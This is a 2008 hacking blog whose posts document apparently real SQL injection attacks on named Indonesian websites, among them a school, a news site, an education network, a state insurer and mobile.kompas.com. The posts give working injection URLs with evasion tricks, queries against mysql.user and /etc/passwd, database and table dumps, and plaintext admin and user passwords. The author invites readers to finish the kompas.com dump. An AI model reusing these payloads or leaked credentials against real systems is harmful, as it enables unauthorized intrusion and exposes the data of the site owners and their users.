viperfx07 is here to blog about hacking, cracking, website, application, android, and many more.

Wednesday, October 29, 2008

[SQLi] http://seaedunet.seamolec.org

5:27 PM Posted by viperfx07 No comments
Tool: schemafuzz.py v5.0

[+] URL:http://seaedunet.seamolec.org/main.php?isi=newsdetail&&id=78+AND+1=2+UNION+SELECT+0,sqli,2,3,4--
[+] Evasion Used: "+" "--"
[+] 17:19:39
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: seaedunet_db
User: seaedunet@localhost
Version: 5.0.32-Debian_7etch6-log

[+] Do we have Access to MySQL Database: Yes <-- w00t w00t
[!] http://seaedunet.seamolec.org/main.php?isi=newsdetail&&id=78+AND+1=2+UNION+SELECT+0,concat(user,0x3a,password),2,3,4+FROM+mysql.user--

[+] Do we have Access to Load_File: Yes <-- w00t w00t
[!] http://seaedunet.seamolec.org/main.php?isi=newsdetail&&id=78+AND+1=2+UNION+SELECT+0,load_file(0x2f6574632f706173737764),2,3,4--

[-] [17:19:55]
[-] Total URL Requests 3
[-] Done


[+] URL:http://seaedunet.seamolec.org/main.php?isi=newsdetail&&id=78+AND+1=2+UNION+SELECT+0,sqli,2,3,4--
[+] Evasion Used: "+" "--"
[+] 17:20:33
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: seaedunet_db
User: seaedunet@localhost
Version: 5.0.32-Debian_7etch6-log
[+] Showing all databases current user has access too!
[+] Number of Databases: 39

[0]apceiu_db
[1]blog_db
[2]chatseadunet_db
[3]claroline
[4]cocc_ifiti
[5]darmasiswa
[6]diaz
[7]dokeos
[8]dokeos_main
[9]dokeos_stats
[10]dokeos_user
[11]forum
[12]forumseadunet_db
[13]games
[14]helping_db
[15]homepage
[16]ibagz
[17]iblog
[18]inet
[19]jeni
[20]joomla
[21]konsultasismm_db
[22]mitra_db
[23]moo
[24]moodle
[25]moodleseaedunet_db
[26]mysql
[27]p4tk_db
[28]pgsd_db
[29]pictures
[30]research_db
[31]scholarship
[32]seaedunet_db
[33]seamolec
[34]searadio_db
[35]seminar08
[36]test
[37]training_db
[38]x7chat

[-] [17:24:19]
[-] Total URL Requests 41
[-] Done

Monday, October 27, 2008

Here in Australia...

5:58 PM Posted by viperfx07 No comments
Wow man, everyday is a busy day. Moving to another country is not an easy task for me. With an "unhuman" weather, i've already got sicked these days, sore throat and runny nose.

So, here in Australia, I can easily do hacking stuff like in Indonesia. I try to "play safe" and not ruin my permit to study here. In here, I can't download as much as i did in Indonesia (poor me). I think Indonesia is better now.

I'll keep updating my blog. So stay tuned...

Wednesday, October 15, 2008

[SQLi] http://sman1-boyolali.com

5:05 PM Posted by viperfx07 No comments


Tool --> schemafuzz.py v5.0
Admin login page --> http://sman1-boyolali.com/admin/
Admin usr:pwd --> admin:mastar1234
Dump:
[+] URL:http://sman1-boyolali.com/detailberita.php?id=6+AND+1=2+UNION+SELECT+0,sqli,2,3,4,5,6,7,8--
[+] Evasion Used: "+" "--"
[+] 12:40:16
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: sman1bo_smanbo
User: sman1bo@localhost
Version: 5.0.51a-community

[Database]: sman1bo_smanbo
[Table: Columns]
[0]admin: idadmin,username,password
[1]artikel: idartikel,idkategori,judul,isi_artikel,penulis,namapenulis,jam,tanggal,publik
[2]file: idfile,namafile,tanggal,jam,file,username,nama,keterangan
[3]gallery: idphoto,namaphoto,tanggal,jam,photo,keterangan
[4]guestbook: no_gb,nama,tanggal,jam,email,isi_gb
[5]kategori: idkategori,isi_kategori
[6]link: idlink,namalink,alamatweb
[7]polling: id_polling,tanggal,pertanyaan,A,B,C,D,E,jawabanA,jawabanB,jawabanC,jawabanD,jawabanE
[8]profil: idprofil,halaman,isi_halaman,tanggal,jam
[9]salam: idsalam,isi_salam,jam,tanggal
[10]user: iduser,username,nama,nmortu,password,status,photo,tempat_lahir,tgl_lahir,jk,th_masuk,alamat,telp,email,salam,ket

[-] [12:42:43]
[-] Total URL Requests 77
[-] Done

[+] URL:http://sman1-boyolali.com/detailberita.php?id=6+AND+1=2+UNION+SELECT+0,sqli,2,3,4,5,6,7,8--
[+] Evasion Used: "+" "--"
[+] 12:44:45
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: sman1bo_smanbo
User: sman1bo@localhost
Version: 5.0.51a-community
[+] Dumping data from database "sman1bo_smanbo" Table "user"
[+] Column(s) ['username', 'password']
[+] Number of Rows: 966

[0] admin:mastar1234:
[1] 13842:010645:
[2] 13843:010713:
[3] 13844:010742:
[4] 13841:010012:
[5] 13840:005849:
[6] 13839:005807:
[7] 13845:010810:
[8] 13846:010843:
[9] 13847:010903:
[10] 13848:010926:
[11] 13849:010948:
[12] 13850:011007:
-----cut here coz it's too many---

[SQLi] http://www.buturnews.idrap.or.id

3:14 PM Posted by viperfx07 No comments


Tool --> blindext.py v5.0
User login --> buturnews:banda1302 (see else in dump)
Dump:
[+] URL:http://www.buturnews.idrap.or.id/detailBerita.php?ID=62
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
[+] MySQL >= v5.0.0 found!
[+] Showing Tables from database "t79166_dbbutur"
[+] 10:12:30
[+] Number of Rows: 5

[0]: tberita
[1]: tcounter
[2]: topini
[3]: ttamu
[4]: tuser

[-] 10:24:56
[-] Total URL Requests 292
[-] Done


[+] URL:http://www.buturnews.idrap.or.id/detailBerita.php?ID=62
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
[+] MySQL >= v5.0.0 found!
[+] Showing Columns from database "t79166_dbbutur" and Table "tuser"
[+] 10:25:33
[+] Number of Rows: 16

[0]: IDUSER
[1]: JENIS_KEL
[2]: JABATAN
[3]: USERNAME
[4]: PASSWORD
[5]: NAMA_DEPAN
[6]: NAMA_AKHIR
[7]: AGAMA
---------- cut here because it's too boring -----

[+] URL:http://www.buturnews.idrap.or.id/detailBerita.php?ID=62
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
[+] MySQL >= v5.0.0 found!
[+] Dumping data from database "t79166_dbbutur" Table "tuser"
[+] Column(s) ['username', 'password']
[+] 10:47:55
[+] Number of Rows: 8

[0]: harmin70:hh070729
[1]: bob:kana10
[2]: syair79:as080218
[3]: buturnews:banda1302
[4]: husain78:hs070725
[5]: hamzah75:hz080224
[6]: arif82:ar080401
[7]: tasrun87:tm080410

[-] 10:56:34
[-] Total URL Requests 975
[-] Done

[SQLi] http://www.jiwasraya.co.id

2:30 PM Posted by viperfx07 No comments


Admin login page --> http://www.jiwasraya.co.id/admin/
Admin usr:pwd --> admin:ari1007 (see else in dump)
Dump:
[+] URL:http://www.jiwasraya.co.id/detailberita.php?id=233+AND+1=2+UNION+SELECT+sqli--
[+] Evasion Used: "+" "--"
[+] 09:51:11
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: jiwasraya1
User: root@localhost
Version: 5.0.18-log

[+] Do we have Access to MySQL Database: Yes <-- w00t w00t
[!] http://www.jiwasraya.co.id/detailberita.php?id=233+AND+1=2+UNION+SELECT+concat(user,0x3a,password)+FROM+mysql.user--

[+] Do we have Access to Load_File: No

[-] [09:51:14]
[-] Total URL Requests 3
[-] Done

[Database]: aims
[Table: Columns]
[0]download: id,filename,description
[1]example: id,titel,url
[2]menu: menu_id,nama_menu,menu_id_induk,link,no_urut
[3]role: role_id,nama_role
[4]role_menu: role_id,menu_id
[5]user: userid,password,username,email,address,kota,phone,zipcode,birthdate,sex
[6]user_role: userid,role_id

[Database]: casc
[Table: Columns]
[0]menu: menu_id,text_id,text_en,main_menu_id,link,image,level,status
[1]menucontent: menu_id,title,intro,content,status,record_date,user_record,user_update,update_date,image,pic_position,link,lang_id
[2]organisasi: kd_organisasi,nama_organisasi
[3]pegawai: nip,nama,jabatan,unitkerja,kdkantor,kdorganisasi,email
[4]userid: user_id,password,name,birthdate,sex,email,address,city,province_id,zipcode,phone,fax,url,user_level,added_by,added_date,status,kd_jenis,confirmid,nopertanggungan
[5]vk2: no_polis,pemegang_polis,no_sertifikat,nama,alamat,kota,propinsi,telp,hp,no_serial,tempat_lahir,tgl_lahir,jenisid,nomorid,ua,premi,idpremi,tgl_mulas,tgl_exp,ahliwaris_1,hubungan_1,ahliwaris_2,hubungan_2,ahliwaris_3,hubungan_3,id,vkidpri,vkid,serialno,tglaplikasi,regid,tgl_premi_lunas,tgl_rekam

[Database]: codextra_db
[Table: Columns]
[0]openwirx: ID,Serial,LanMAC,WirMAC,IP,Location,DataNo,Station,Switch,Port,Info

[Database]: jiwasraya
[Table: Columns]
[0]admin: id,level,username,password,email
[1]agen: noagen,nama,user_id,sk_agen,no_ijin,kdkantor,email,phone,alamat,status
[2]article: art_id,cat_id,art_date,art_title_id,art_title_en,art_intro_id,art_intro_en,art_content_id,art_content_en,art_pic,author,source,location,user_record,user_update,user_approve,date_update,date_approve,status
[3]articlecat: cat_id,cat_title_id,cat_title_en,cat_icon,cat_thumb,cat_desc,status
[4]award: id,pic,intro_id,intro_en
[5]banner: id,nm_banner,file
[6]jenis_user: kd_jenis,nama_jenis,status
[7]kantor: kdkantor,namakantor,kdkantorinduk,alamat,kota,kdpropinsi,phone,fax,email,kodepos,url
[8]kode_file: kd_file,nama,keterangan
[9]kode_jabatan: kd_jabatan,jabatan_id,jabatan_en
[10]kode_organisasi: kd_organisasi,organisasi_id,organisasi_en,keterangan,rowid
[11]kurs: kdvaluta,namavaluta,simbol,tglberlaku,status,nilai
[12]layanan: id,nama,pekerjaan,email,alamat,kodepos,kota,telprumah,telpselular,telpkantor,status,pesan,ticket_id,answer,admin_id
[13]level_user: kd_level,nama_level
[14]log: time,ipaddress,userid,taskname,note
[15]menu: rowid,menu_id,text_id,text_en,main_menu_id,link,image,level,status
[16]menucontent: menu_id,title,intro,content,status,record_date,user_record,user_update,update_date,image,pic_position,link,lang_id
[17]milis: email,name,username,password,ip,time,membercode,confirm,confirmid
[18]newmenu: id,seq,parent,title_id,title_en,link_id,link_en,level,status,mm,min
[19]newsletter: art_id,art_title,art_content,art_pic,author,source,location,user_record,user_update,user_approve,date_record,date_update,date_approve,pic_position,lang_id,status
[20]p_admin: ID,username,password
[21]p_choices: ID,answer,votes
[22]p_ip: ID,IP
[23]p_question: ID,question
[24]pejabat: pejabat_id,nama,jabatan,photo,kdkantor,keterangan,kdmanager,kdorganisasi,user_update,tgl_update
[25]pengumuman: id,cat_id,date,title_id,title_en,intro_id,intro_en,content_id,content_en,pic,author,source,location,status
[26]pengumuman_cat: id,nama,nama_en
[27]poll_jawab: id,nama,hits,poll_id
[28]poll_tanya: id,tanggal,nama
[29]produk: kdproduk,pr_cat_id,pr_sub_id,pr_kel_id,namaproduk,keterangan,en_keterangan,profile,en_profile,icon,pic,status,tgl_rekam
[30]produk_cat: id,nama_id,nama_en
[31]produk_kel: sub_id,id,nama_id,nama_en
[32]produk_sub: cat_id,id,nama_id,nama_en
[33]propinsi: kdpropinsi,namapropinsi
[34]spaj_beneficiary: spaj_id,beneficiary_id,nama,tgl_lahir,hubungan,jenis_id,nomor_id,pekerjaan,tinggi_badan,berat_badan,jenis_kelamin,perokok,session_id,status
[35]spaj_ketentuanpolis: spaj_id,kdproduk,valuta,carabayar,cara_pelunasan,mulas,jua,masa_asuransi,masa_premi,premi,jaminan_lengkap,jua_tambahan,premi_tambahan,session_id,status
[36]spaj_pmg_polis: spaj_id,nama,jenis_id,no_id,warga_negara,nama_ibu,tgl_lahir,jenis_kelamin,perokok,pekerjaan,jabatan,valuta_penghasilan,penghasilan,tinggi_badan,berat_badan,alamat_rumah,rt_rw,kodepos,kdpropinsi,kdnegara,kotamadya,kd_wilayah,telepon,hp,status,session_id,email
[37]spaj_polis_exist: spaj_id,nopolis,jua,premi,prsh_asuransi,status_polis,session_id,status
[38]spaj_tertanggung: spaj_id,nama,jenis_id,no_id,warga_negara,nama_ibu,tgl_lahir,jenis_kelamin,perokok,pekerjaan,jabatan,valuta_penghasilan,penghasilan,tinggi_badan,berat_badan,alamat_rumah,rt_rw,kodepos,kdpropinsi,kdnegara,kotamadya,kd_wilayah,telepon,hp,status,session_id,email
[39]static: cat_id,id,title_id,title_en,content_id,content_en
[40]static_cat: id,nama
[41]upload: id,nama,keterangan,time,user,size
[42]userid: user_id,password,name,birthdate,sex,email,address,city,province_id,zipcode,phone,fax,url,user_level,added_by,added_date,status,kd_jenis,confirmid,nopertanggungan

[Database]: jiwasraya1
[Table: Columns]
[0]admin: id,level,username,password,email
[1]article: art_id,cat_id,art_date,art_title_id,art_title_en,art_intro_id,art_intro_en,art_content_id,art_content_en,art_pic,author,source,location,user_record,user_update,user_approve,date_update,date_approve,status
[2]articlecat: cat_id,cat_title_id,cat_title_en,cat_icon,cat_thumb,cat_desc,status
[3]award: id,pic,intro_id,intro_en,tgl
[4]banner: id,posisi,link,file
[5]dplk_pin: no_peserta,kode_group,no_pin,email
[6]email_us: id,email
[7]intro: id,title_id,intro_id,title_en,intro_en
[8]intro_flash: tgl_dari,tgl_sampai,file_id,file_en
[9]j_quiz: id,id_soal,jawaban,status
[10]kantor: kdkantor,namakantor,kdkantorinduk,alamat,kota,kdpropinsi,phone,fax,email,kodepos,url
[11]layanan: id,nama,status,alamat,kodepos,kota,tlprumah,tlpkantor,hp,pekerjaan,email,pesan,tgl,kode
[12]magazine: id,bulan,tahun,judul,deskripsi,file,pic
[13]mail_service: id,email
[14]memberarea: id,link,nama_id,nama_en,desc_id,desc_en
[15]newmenu: id,seq,parent,title_id,title_en,link_id,link_en,level,status,mm,min
[16]p_admin: ID,username,password
[17]p_choices: ID,answer,votes
[18]p_ip: ID,IP
[19]p_question: ID,question
[20]pengumuman: id,cat_id,date,title_id,title_en,intro_id,intro_en,content_id,content_en,pic,author,source,location,status
[21]pengumuman_cat: id,nama,nama_en
[22]produk: kdproduk,kdsimulasi,pr_cat_id,pr_sub_id,pr_kel_id,namaproduk,keterangan,en_keterangan,profile,en_profile,icon,pic,status,tgl_rekam
[23]produk_cat: id,nama_id,nama_en
[24]produk_kel: sub_id,id,nama_id,nama_en
[25]produk_sub: cat_id,id,nama_id,nama_en
[26]quiz: id,soal
[27]static: cat_id,id,title_id,title_en,content_id,content_en
[28]static_cat: id,nama
[29]upload: id,kategori,judul,nama,keterangan,time,user,size
[30]user_quiz: id,nama,ktp,alamat,telp,email,jwb_1,jwb_2,jwb_3,status,tgl
[31]user_quiz_old: id,nama,ktp,alamat,telp,email,jwb_1,jwb_2,jwb_3,status,tgl
[32]userid: user_id,password,name,birthdate,sex,email,address,city,province_id,zipcode,phone,fax,url,user_level,added_by,added_date,status,kd_jenis,confirmid,nopertanggungan,nopertanggungan2,nopertanggungan3,nopertanggungan4,nopertanggungan5
[33]vk: no_polis,pemegang_polis,no_sertifikat,nama,alamat,kota,propinsi,telp,hp,no_serial,tempat_lahir,tgl_lahir,jenisid,nomorid,ua,premi,idpremi,tgl_mulas,tgl_exp,ahliwaris_1,hubungan_1,ahliwaris_2,hubungan_2,ahliwaris_3,hubungan_3,id,vkidpri,vkid,serialno,tglaplikasi,regid,tgl_premi_lunas,tgl_rekam

[Database]: mysql
[Table: Columns]
[0]columns_priv: Host,Db,User,Table_name,Column_name,Timestamp,Column_priv
[1]db: Host,Db,User,Select_priv,Insert_priv,Update_priv,Delete_priv,Create_priv,Drop_priv,Grant_priv,References_priv,Index_priv,Alter_priv,Create_tmp_table_priv,Lock_tables_priv,Create_view_priv,Show_view_priv,Create_routine_priv,Alter_routine_priv,Execute_priv
[2]func: name,ret,dl,type
[3]help_category: help_category_id,name,parent_category_id,url
[4]help_keyword: help_keyword_id,name
[5]help_relation: help_topic_id,help_keyword_id
[6]help_topic: help_topic_id,name,help_category_id,description,example,url
[7]host: Host,Db,Select_priv,Insert_priv,Update_priv,Delete_priv,Create_priv,Drop_priv,Grant_priv,References_priv,Index_priv,Alter_priv,Create_tmp_table_priv,Lock_tables_priv,Create_view_priv,Show_view_priv,Create_routine_priv,Alter_routine_priv,Execute_priv
[8]proc: db,name,type,specific_name,language,sql_data_access,is_deterministic,security_type,param_list,returns,body,definer,created,modified,sql_mode,comment
[9]procs_priv: Host,Db,User,Routine_name,Routine_type,Grantor,Proc_priv,Timestamp
[10]tables_priv: Host,Db,User,Table_name,Grantor,Timestamp,Table_priv,Column_priv
[11]time_zone: Time_zone_id,Use_leap_seconds
[12]time_zone_leap_second: Transition_time,Correction
[13]time_zone_name: Name,Time_zone_id
[14]time_zone_transition: Time_zone_id,Transition_time,Transition_type_id
[15]time_zone_transition_type: Time_zone_id,Transition_type_id,Offset,Is_DST,Abbreviation
[16]user: Host,User,Password,Select_priv,Insert_priv,Update_priv,Delete_priv,Create_priv,Drop_priv,Reload_priv,Shutdown_priv,Process_priv,File_priv,Grant_priv,References_priv,Index_priv,Alter_priv,Show_db_priv,Super_priv,Create_tmp_table_priv,Lock_tables_priv,Execute_priv,Repl_slave_priv,Repl_client_priv,Create_view_priv,Show_view_priv,Create_routine_priv,Alter_routine_priv,Create_user_priv,ssl_type,ssl_cipher,x509_issuer,x509_subject,max_questions,max_updates,max_connections,max_user_connections

[Database]: nuke
[Table: Columns]
[0]nuke_authors: aid,name,url,email,pwd,counter,radminsuper,admlanguage
[1]nuke_autonews: anid,catid,aid,title,time,hometext,bodytext,topic,informant,notes,ihome,alanguage,acomm,associated
[2]nuke_banned_ip: id,ip_address,reason,date
[3]nuke_banner: bid,cid,name,imptotal,impmade,clicks,imageurl,clickurl,alttext,date,dateend,position,active,ad_class,ad_code,ad_width,ad_height
[4]nuke_banner_clients: cid,name,contact,email,login,passwd,extrainfo
[5]nuke_banner_plans: pid,active,name,description,delivery,delivery_type,price,buy_links
[6]nuke_banner_positions: apid,position_number,position_name
[7]nuke_banner_terms: terms_body,country
[8]nuke_bbauth_access: group_id,forum_id,auth_view,auth_read,auth_post,auth_reply,auth_edit,auth_delete,auth_sticky,auth_announce,auth_vote,auth_pollcreate,auth_attachments,auth_mod
[9]nuke_bbbanlist: ban_id,ban_userid,ban_ip,ban_email,ban_time,ban_expire_time,ban_by_userid,ban_priv_reason,ban_pub_reason_mode,ban_pub_reason
[10]nuke_bbcategories: cat_id,cat_title,cat_order
[11]nuke_bbconfig: config_name,config_value
[12]nuke_bbdisallow: disallow_id,disallow_username
[13]nuke_bbforum_prune: prune_id,forum_id,prune_days,prune_freq
[14]nuke_bbforums: forum_id,cat_id,forum_name,forum_desc,forum_status,forum_order,forum_posts,forum_topics,forum_last_post_id,prune_next,prune_enable,auth_view,auth_read,auth_post,auth_reply,auth_edit,auth_delete,auth_sticky,auth_announce,auth_vote,auth_pollcreate,auth_attachments
[15]nuke_bbgroups: group_id,group_type,group_name,group_description,group_moderator,group_single_user
[16]nuke_bbposts: post_id,topic_id,forum_id,poster_id,post_time,poster_ip,post_username,enable_bbcode,enable_html,enable_smilies,enable_sig,post_edit_time,post_edit_count
[17]nuke_bbposts_text: post_id,bbcode_uid,post_subject,post_text
[18]nuke_bbprivmsgs: privmsgs_id,privmsgs_type,privmsgs_subject,privmsgs_from_userid,privmsgs_to_userid,privmsgs_date,privmsgs_ip,privmsgs_enable_bbcode,privmsgs_enable_html,privmsgs_enable_smilies,privmsgs_attach_sig
[19]nuke_bbprivmsgs_text: privmsgs_text_id,privmsgs_bbcode_uid,privmsgs_text
[20]nuke_bbranks: rank_id,rank_title,rank_min,rank_max,rank_special,rank_image
[21]nuke_bbsearch_results: search_id,session_id,search_array
[22]nuke_bbsearch_wordlist: word_text,word_id,word_common
[23]nuke_bbsearch_wordmatch: post_id,word_id,title_match
[24]nuke_bbsessions: session_id,session_user_id,session_start,session_time,session_ip,session_page,session_logged_in,session_admin
[25]nuke_bbsmilies: smilies_id,code,smile_url,emoticon
[26]nuke_bbthemes: themes_id,template_name,style_name,head_stylesheet,body_background,body_bgcolor,body_text,body_link,body_vlink,body_alink,body_hlink,tr_color1,tr_color2,tr_color3,tr_class1,tr_class2,tr_class3,th_color1,th_color2,th_color3,th_class1,th_class2,th_class3,td_color1,td_color2,td_color3,td_class1,td_class2,td_class3,fontface1,fontface2,fontface3,fontsize1,fontsize2,fontsize3,fontcolor1,fontcolor2,fontcolor3,span_class1,span_class2,span_class3,img_size_poll,img_size_privmsg
[27]nuke_bbthemes_name: themes_id,tr_color1_name,tr_color2_name,tr_color3_name,tr_class1_name,tr_class2_name,tr_class3_name,th_color1_name,th_color2_name,th_color3_name,th_class1_name,th_class2_name,th_class3_name,td_color1_name,td_color2_name,td_color3_name,td_class1_name,td_class2_name,td_class3_name,fontface1_name,fontface2_name,fontface3_name,fontsize1_name,fontsize2_name,fontsize3_name,fontcolor1_name,fontcolor2_name,fontcolor3_name,span_class1_name,span_class2_name,span_class3_name
[28]nuke_bbtopics: topic_id,forum_id,topic_title,topic_poster,topic_time,topic_views,topic_replies,topic_status,topic_vote,topic_type,topic_last_post_id,topic_first_post_id,topic_moved_id
[29]nuke_bbtopics_watch: topic_id,user_id,notify_status
[30]nuke_bbuser_group: group_id,user_id,user_pending
[31]nuke_bbvote_desc: vote_id,topic_id,vote_text,vote_start,vote_length
[32]nuke_bbvote_results: vote_id,vote_option_id,vote_option_text,vote_result
[33]nuke_bbvote_voters: vote_id,vote_user_id,vote_user_ip
[34]nuke_bbwords: word_id,word,replacement
[35]nuke_blocks: bid,bkey,title,content,url,bposition,weight,active,refresh,time,blanguage,blockfile,view,expire,action,subscription
[36]nuke_cities: id,local_id,city,cc,country
[37]nuke_comments: tid,pid,sid,date,name,email,url,host_name,subject,comment,score,reason,last_moderation_ip
[38]nuke_comments_moderated: tid,pid,sid,date,name,email,url,host_name,subject,comment,score,reason,last_moderation_ip
[39]nuke_config: sitename,nukeurl,site_logo,slogan,startdate,adminmail,anonpost,Default_Theme,foot1,foot2,foot3,commentlimit,anonymous,minpass,pollcomm,articlecomm,broadcast_msg,my_headlines,top,storyhome,user_news,oldnum,ultramode,banners,backend_title,backend_language,language,locale,multilingual,useflags,notify,notify_email,notify_subject,notify_message,notify_from,footermsgtxt,email_send,attachmentdir,attachments,attachments_view,download_dir,defaultpopserver,singleaccount,singleaccountname,numaccounts,imgpath,filter_forward,moderate,admingraphic,httpref,httprefmax,CensorMode,CensorReplace,copyright,Version_Num
[40]nuke_confirm: confirm_id,session_id,code
[41]nuke_contactbook: uid,contactid,firstname,lastname,email,company,homeaddress,city,homephone,workphone,homepage,IM,events,reminders,notes
[42]nuke_counter: type,var,count
[43]nuke_downloads_categories: cid,title,cdescription,parentid
[44]nuke_downloads_downloads: lid,cid,sid,title,url,description,date,name,email,hits,submitter,downloadratingsummary,totalvotes,totalcomments,filesize,version,homepage
[45]nuke_downloads_editorials: downloadid,adminid,editorialtimestamp,editorialtext,editorialtitle
[46]nuke_downloads_modrequest: requestid,lid,cid,sid,title,url,description,modifysubmitter,brokendownload,name,email,filesize,version,homepage
[47]nuke_downloads_newdownload: lid,cid,sid,title,url,description,name,email,submitter,filesize,version,homepage
[48]nuke_downloads_votedata: ratingdbid,ratinglid,ratinguser,rating,ratinghostname,ratingcomments,ratingtimestamp
[49]nuke_encyclopedia: eid,title,description,elanguage,active
[50]nuke_encyclopedia_text: tid,eid,title,text,counter
[51]nuke_ephem: eid,did,mid,yid,content,elanguage
[52]nuke_faqanswer: id,id_cat,question,answer
[53]nuke_faqcategories: id_cat,categories,flanguage
[54]nuke_groups: id,name,description,points
[55]nuke_groups_points: id,points
[56]nuke_headlines: hid,sitename,headlinesurl
[57]nuke_journal: jid,aid,title,bodytext,mood,pdate,ptime,status,mtime,mdate
[58]nuke_journal_comments: cid,rid,aid,comment,pdate,ptime
[59]nuke_journal_stats: id,joid,nop,ldp,ltp,micro
[60]nuke_links_categories: cid,title,cdescription,parentid
[61]nuke_links_editorials: linkid,adminid,editorialtimestamp,editorialtext,editorialtitle
[62]nuke_links_links: lid,cid,sid,title,url,description,date,name,email,hits,submitter,linkratingsummary,totalvotes,totalcomments
[63]nuke_links_modrequest: requestid,lid,cid,sid,title,url,description,modifysubmitter,brokenlink
[64]nuke_links_newlink: lid,cid,sid,title,url,description,name,email,submitter
[65]nuke_links_votedata: ratingdbid,ratinglid,ratinguser,rating,ratinghostname,ratingcomments,ratingtimestamp
[66]nuke_main: main_module
[67]nuke_message: mid,title,content,date,expire,active,view,mlanguage
[68]nuke_modules: mid,title,custom_title,active,view,inmenu,mod_group,admins
[69]nuke_pages: pid,cid,title,subtitle,active,page_header,text,page_footer,signature,date,counter,clanguage
[70]nuke_pages_categories: cid,title,description
[71]nuke_poll_check: ip,time,pollID
[72]nuke_poll_data: pollID,optionText,optionCount,voteID
[73]nuke_poll_desc: pollID,pollTitle,timeStamp,voters,planguage,artid,comments
[74]nuke_pollcomments: tid,pid,pollID,date,name,email,url,host_name,subject,comment,score,reason,last_moderation_ip
[75]nuke_pollcomments_moderated: tid,pid,pollID,date,name,email,url,host_name,subject,comment,score,reason,last_moderation_ip
[76]nuke_popsettings: id,uid,account,popserver,port,uname,passwd,numshow,deletefromserver,refresh,timeout
[77]nuke_priv_msgs: msg_id,msg_image,subject,from_userid,to_userid,msg_time,msg_text,read_msg
[78]nuke_public_messages: mid,content,date,who
[79]nuke_queue: qid,uid,uname,subject,story,storyext,timestamp,topic,alanguage
[80]nuke_quotes: qid,quote
[81]nuke_referer: rid,url
[82]nuke_related: rid,tid,name,url
[83]nuke_reviews: id,date,title,text,reviewer,email,score,cover,url,url_title,hits,rlanguage
[84]nuke_reviews_add: id,date,title,text,reviewer,email,score,url,url_title,rlanguage
[85]nuke_reviews_comments: cid,rid,userid,date,comments,score
[86]nuke_reviews_comments_moderated: cid,rid,userid,date,comments,score
[87]nuke_reviews_main: title,description
[88]nuke_session: uname,time,host_addr,guest
[89]nuke_stats_date: year,month,date,hits
[90]nuke_stats_hour: year,month,date,hour,hits
[91]nuke_stats_month: year,month,hits
[92]nuke_stats_year: year,hits
[93]nuke_stories: sid,catid,aid,title,time,hometext,bodytext,comments,counter,topic,informant,notes,ihome,alanguage,acomm,haspoll,pollID,score,ratings,rating_ip,associated
[94]nuke_stories_cat: catid,title,counter
[95]nuke_subscriptions: id,userid,subscription_expire
[96]nuke_topics: topicid,topicname,topicimage,topictext,counter
[97]nuke_users: user_id,name,username,user_email,femail,user_website,user_avatar,user_regdate,user_icq,user_occ,user_from,user_interests,user_sig,user_viewemail,user_theme,user_aim,user_yim,user_msnm,user_password,storynum,umode,uorder,thold,noscore,bio,ublockon,ublock,theme,commentmax,counter,newsletter,user_posts,user_attachsig,user_rank,user_level,broadcast,popmeson,user_active,user_session_time,user_session_page,user_lastvisit,user_timezone,user_style,user_lang,user_dateformat,user_new_privmsg,user_unread_privmsg,user_last_privmsg,user_emailtime,user_allowhtml,user_allowbbcode,user_allowsmile,user_allowavatar,user_allow_pm,user_allow_viewonline,user_notify,user_notify_pm,user_popup_pm,user_avatar_type,user_sig_bbcode_uid,user_actkey,user_newpasswd,points,last_ip,karma
[98]nuke_users_temp: user_id,username,user_email,user_password,user_regdate,check_num,time
[99]nuke_users_verify: uv_id,username,user_question,user_answer

[-] [10:23:30]
[-] Total URL Requests 1736
[-] Done


[+] URL:http://www.jiwasraya.co.id/detailberita.php?id=233+AND+1=2+UNION+SELECT+sqli--
[+] Evasion Used: "+" "--"
[+] 10:24:08
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: jiwasraya1
User: root@localhost
Version: 5.0.18-log
[+] Dumping data from database "jiwasraya1" Table "admin"
[+] Column(s) ['username', 'password']
[+] Number of Rows: 5

[0] admin:ari1007:
[1] budi:ari1007:
[2] valent:ari1007:
[3] humas:humas:
[4] fonny:nonaktif:

[-] [10:24:50]
[-] Total URL Requests 9
[-] Done

[SQLi] http://mobile.kompas.com

1:06 AM Posted by viperfx07 No comments
I try to get the full schema of kompas.com but i'm too tired, and it's too many. If you're so eager to "hack", try to get them all :)

Info:
[+] URL:http://mobile.kompas.com/?go=p&pid=1&idm=8'/**/AND/**/1=2/**/UNION/**/SELECT/**/0,sqli,2,3/*
[+] Evasion Used: "/**/" "/*"
[+] 17:59:19
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: kompasmobile
User: megadb@10.50.12.196
Version: 5.0.22

[+] Do we have Access to MySQL Database: Yes <-- w00t w00t
[!] http://mobile.kompas.com/?go=p&pid=1&idm=8'/**/AND/**/1=2/**/UNION/**/SELECT/**/0,concat(user,0x3a,password),2,3/**/FROM/**/mysql.user/*

[+] Do we have Access to Load_File: Yes <-- w00t w00t
[!] http://mobile.kompas.com/?go=p&pid=1&idm=8'/**/AND/**/1=2/**/UNION/**/SELECT/**/0,load_file(0x2f6574632f706173737764),2,3/*


Dump:
[+] URL:http://mobile.kompas.com/?go=p&pid=1&idm=8'/**/AND/**/1=2/**/UNION/**/SELECT/**/0,sqli,2,3/*
[+] Evasion Used: "/**/" "/*"
[+] 20:52:57
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: kompasmobile
User: megadb@10.50.12.196
Version: 5.0.22
[+] Showing all databases current user has access too!
[+] Number of Databases: 45

[0]adprimainfo
[1]blog
[2]blogat141
[3]entertainment
[4]forumprimainfo
[5]jakartacmoclub
[6]kompas
[7]kompas_blog
[8]kompas_blog2
[9]kompas_cetak
[10]kompasblog
[11]kompasclient
[12]kompasclient2
[13]kompascommunity
[14]kompasforum
[15]kompasiana
[16]kompasimages
[17]kompasmobile
[18]kompasmuda
[19]kompasnewblog
[20]kontan
[21]kontan2
[22]kontanBKUP
[23]kontanBKUP2
[24]limesurvey
[25]lost+found
[26]mobile
[27]mysql
[28]phplistdb
[29]primainfo
[30]sriwijayapost
[31]test
[32]tribunkaltim
[33]u_amazingthai
[34]u_bentarabudaya
[35]u_bentarabudayaBK
[36]u_cantikitu
[37]u_hepi
